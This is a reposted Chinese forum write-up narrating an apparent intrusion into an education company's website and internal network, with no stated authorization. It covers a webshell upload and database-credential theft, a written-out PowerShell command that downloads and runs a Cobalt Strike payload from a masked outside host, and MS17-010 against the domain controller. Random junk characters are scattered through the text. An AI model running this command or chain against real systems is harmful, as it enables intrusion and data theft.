找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2466|回复: 0
打印 上一主题 下一主题

渗透实战 | 从外网直接打到内网全过程

[复制链接]
跳转到指定楼层
楼主
发表于 2024-3-1 19:41:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

. b# W) X' y$ M; R# T 这次渗透是一个从01,从外网到拿下域控的实战过程,希望可以给大家一些思路 $ R2 |# z# b5 J8 W

8 k4 V6 v p6 R! X' C; N, n

9 G% X6 b3 Y1 C! F: M9 J9 b* h  ) z' Y; U' {. G1 g9 l

" h) g' i5 y) ], F9 f x

6 D. a( F5 E' x 正文$ t6 @8 J; |+ A. n7 X- N

( _, H, L0 S$ W9 p9 \

+ q$ o( j& {: ?: I   * Y; ]2 s9 R6 }% f4 w

/ ~( D1 h8 k R: g3 S0 z% n- J8 |

p, z( G }2 j1 j T8 f* Z' d. A6 @ 目标:www.xxxx.com(一家教育机构)
" Z1 Z8 k9 y7 o" g& E
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
( t* Q! T/ ^. {* g8 ?. W6 Z

8 V$ r$ ~, v2 W# y# O

4 q' f" C, W' [3 { vshapes=9 T& b( o& S! G$ V

. @, u% E! P5 C7 d

% o, L$ q% e2 @: X 进行了简单的信息搜集
y2 d; c, p3 ^) y% s, [6 A
2 @, j/ t/ e5 [! j4 a
6 |: v' \% C7 G! t h3 `6 v4 M# O* ^

3 d3 a4 M7 {7 D9 s9 r' c! Y

' s; b; U# j- o- e 子域名搜集 + Z6 b4 K! B0 O, E/ W7 G

3 A* w1 b" r# k

$ \. u6 g( m9 G8 L; e vshapes= 8 N1 X4 D x( Q0 B

) [; H. Z" i( S. N

! ~: M1 Y/ N# q2 N5 j: ^ fofa找资产
# \! K# ]3 [5 j6 S2 ?* a
' I$ L6 g, I0 f! Q7 ~1 a4 _
2 ]9 P5 r) ^# Q' K

0 J1 P; M& t0 }6 z

7 |8 P6 k# v! ^9 s& G vshapes= / Z4 [% H# C; D* b

- T* d" H5 k4 r# y2 I S

; a% @8 {0 ~" A; H6 ^' u# E 一共七个资产。去重之后只有两个。
- d9 _1 }( z% V- Q2 u
8 {1 J2 y, d4 p5 U4 N; x
7 j1 N z3 o1 i* {- |. g

$ I9 f) S; N% [' D4 _: _' q

: [4 H# ^- X1 l. k 目录探测 : |; O2 d- H) }/ ]9 b) d" F

5 s1 y# A5 _( m. C3 e# Q' `

( W0 ~% O" X6 z# N7 k vshapes=' R0 p) q& `6 e9 {

3 F# K. d3 ~$ W

H( U$ G5 o3 ?: E' P6 | 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
- I$ a* R+ H# ?1 ^2 p
! j2 J% C0 V* j
2 n: K" V7 s& l# K! K; y

; p8 C8 r3 B$ w

' r2 Q# h$ U7 M& V# V* ~6 j# ~ 我又尝试了通过修改返回包来绕过登录界面 & s( T5 Z; O8 I; l

% V/ m% c# l: X8 z

) K" Q& I) w) W! e& w* H+ |$ @6 \ vshapes=0 i1 E$ E. F$ s

$ A e$ j1 _) P8 A" i, @0 W& k

1 p# @, o% d9 O! K9 M 还是不行,尝试注入无果 9 q3 T) m( I7 I/ I# B" a

/ u; W, G% H- M& W/ n

: N5 a* z" E2 U, j" [/ _ vshapes= & w b$ S# [/ j- c4 x

0 N, N: n0 b3 i# r8 n6 t

. X7 V6 t- @1 @" W, u" u; ^: J 不过我目录探测出了一处Spring信息泄露
; X7 X, { A& S6 J3 t: L! c7 O+ S% @
9 K. |9 e6 x" {. I
4 J4 K5 W$ {( `) P. J

9 Y1 a( M1 t) k9 e! N7 ^/ L8 H

/ L8 k9 C9 G/ z1 _6 M vshapes=, k: P4 ?% R! F% X

; ?" A) |8 D$ K$ a! O

! d4 X$ ]) H; E: x 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录! f% j" N( g6 W4 p8 u0 c

9 m: Q3 w7 q+ R* y8 e1 i: R6 O5 [) I

; c1 M. i5 {+ z7 R( q6 F vshapes=2 E$ x3 W+ d3 s4 Y. Y

1 ? l; _, E" f: j& b7 M$ k) ]

$ j/ s" `' y! Y1 i' s' Y 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。& h- E8 A" ~, Q

" D; U" c! L( f3 ?

5 I9 m' d. ^+ R/ Y% N8 m- y vshapes= " m% Y4 @: n s( m

$ [0 P% x1 O( J, ]- K G

6 J8 N$ @) N! h. E! X# E! m' | 获取有些师傅到这一步就手机抓包电脑测了。( S2 Y" X3 V1 P) k( u8 M. F3 l3 g" F

0 O# @. o8 S+ m+ Q" G

6 D+ K5 |) k9 A, [5 q0 e Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。 $ m( J' d# u$ d1 l

( e) o/ d8 e2 N0 u4 g! c

. D0 W5 W6 H1 @0 | 其中在一个公众号发现了小程序,可以进行注册。 0 C$ ?' a2 M. s4 ]9 O- s$ l* e8 V

. {+ K& ]- Y! v v, ?( x2 S' l; I

5 v) c9 f/ x1 r 看到了头像上传,尝试上传获取WebShell0 m: V s# N; {9 Q1 n9 G: _

! D' Z( o, o" |- B" P* P

$ I( F$ R8 P; x% [. N/ H/ V4 k1 n% ] vshapes= ) K4 W+ R- l$ v! b V# D) T: ?2 C

% @9 X# O$ d+ T7 \2 F

* G: ` C; a$ M" e 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问2 q3 E/ V+ g% i" W. l/ J

2 y, u6 F. Y5 P& c

; b8 T8 k7 u0 s3 k% i vshapes= ! m4 [. q$ A$ ^7 Q. \* K

& ~2 v' n" D: G& J/ S

: A; y0 ?4 n' W4 \: h F4 D5 p 然后上了大马: A6 f+ U/ P/ o4 h

9 \/ D! H0 S7 `! \

& s' f3 k0 M2 e vshapes= / i/ f f. `3 S( |2 [1 A

, m1 ~. O. C" f! Y z

9 R% q2 c/ ` q, @1 ^ vshapes=* {& J, ]: {- `$ ?/ X

4 B0 p7 O7 x, ?

% Z- i, N* }6 g8 _6 }2 | 通过翻找文件发现数据库账号密码 ( H5 l2 N- U, l" K% g: n: J0 t* x

# F, L% M5 @& r0 p: U( l

* U. s/ U' L9 h, |/ z4 u vshapes= - ~. t1 j2 p$ r$ \* ~7 Z: t

( j8 q9 w( m/ x

# K5 m. g" ^0 Q" U( q* P --内网渗透/ X1 F) [3 C5 k1 u$ | c$ c

! f$ L+ }0 C" ^2 s( O8 H

2 d# `( z3 v: q6 l, M 直接通过powershell执行 cs上线( A* T! T7 t1 e5 |& _! Z6 |/ k

1 r; F# } u9 S

2 D- M2 _% `. @9 |2 i. t powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"8 b* A8 D$ [- Y& s$ h& I# P

2 Q0 _. E _% l0 N1 X5 U- ~

/ L; [) a1 m: f7 D/ E0 Y0 F0 [ vshapes= 7 ]: x! w& n9 m6 j7 u8 F/ k

% h$ @% m6 U0 J3 \) u

% ]. j# q+ A. t) k) U 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破 ], T9 \ C8 ]3 g: G; q

6 n1 M7 i# T. z( u) Q: t' f4 ?; t' m

9 }6 n$ h3 {; V2 i9 u/ A vshapes=: K5 @# {2 G. \" Z- P$ t

* M0 e( u( `" j6 ?) k, ~9 N9 c r5 d

6 B0 j5 g) n6 g7 a% {0 F5 m& p 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
+ L( Y( g# n+ X# j/ E! e
" `; x1 J" o4 h a# ~/ P. S; B q
5 A/ |; ^5 e( Q7 b) y4 B4 w
$ ^5 n+ ]4 \% m3 }! @( P( g+ d% J

7 C; y; z4 e% k! ]! b# p' d4 z

$ t! H9 y& z- M4 u' ^ vshapes= % G# W- T' \3 L4 z0 _' N9 h: u& f

. S, h; ]! m- q

T' v, q% s7 Z( R; {( O 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
. @; {4 `& D" `
9 V% M- \' s/ Z
' r4 F: H& x7 c" y$ r4 L

/ v+ @. i8 R- Q! i% B

2 y9 {( N* o2 v- V' j2 l7 G vshapes= 1 e* x) j6 w' M% v, @

9 }& A6 x3 G! a

7 I0 V7 o0 B! _9 _/ X7 P. `% s6 y+ p
/ g `- @% ^# |0 \- i9 O$ i* j
: R/ [' [1 n2 K" A7 _- s' O
- v% T3 O% l- }& L) S& N2 O

$ {8 F/ d" u2 ^% }* Q

M6 [ X* o6 b0 s6 n' V  6 j6 a8 q' g9 c3 `" d

. W6 O" E* z1 X7 \ Q* E

. L( C7 m4 t4 w( H* D 小结9 l+ c" Z6 u& l$ C: U% c

: z. e5 o+ l( w. x# s4 q, u

# y1 [, A2 Y& K2 V( d* b  8 n S8 G/ z0 F, b

" [0 r8 h& I* l5 G; |

9 V" s( }0 {. X: _9 J1 Z 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路! ' g, ^1 s$ q- ]. s

9 k( ?! v# D: j

8 q( t2 u K* N9 W  " e: {+ b6 c! I

/ \7 G6 Q0 X4 ?8 R- |* U. M
    1 w, b+ u( m2 M) d0 B8 t; t
  • & X5 N9 _$ h8 ?9 b* d   " H% m3 X6 Z' ?. o# A
  • ' w, z% i6 L0 r1 T6 t
  • 4 L6 C; ]2 ?! ~( w. q3 I4 c6 U   : r& g" K4 z2 x5 m
  • + B' V0 y# l: f6 h% f: w
; N3 K' b% A. j* U, q8 `

9 J- R d6 V1 e. N# ` 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html " U Z& X+ ~( Y' @3 \

5 \6 d8 f/ F) T& H& U, E

# k+ ]" r7 n. V* \   4 \& b; G0 N3 z! F" Q

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表